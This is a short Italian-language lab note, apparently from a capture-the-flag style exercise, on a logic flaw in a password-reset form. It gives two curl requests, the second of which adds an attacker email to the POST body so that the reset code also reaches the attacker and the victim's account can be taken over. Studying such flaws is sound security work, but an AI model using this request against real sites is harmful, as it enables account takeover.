tags: Logic_Flaw_Reset_Email Logic_Flaw
Poniamo che ci capiti una sezione di reset password dell’email che accetta questi valori tutti in una singola richiesta:
curl 'http://10.114.130.219/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert'Cosa succederebbe se al campo username ci attaccassimo anche la nostra email di attaccante?:
curl 'http://10.114.130.219/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&[email protected]'Se fosse vulnerabile il codice di reset oltre che arrivare alla vittima arriverebbe anche alla nostra email permettendoci di cambiare la password della vittima.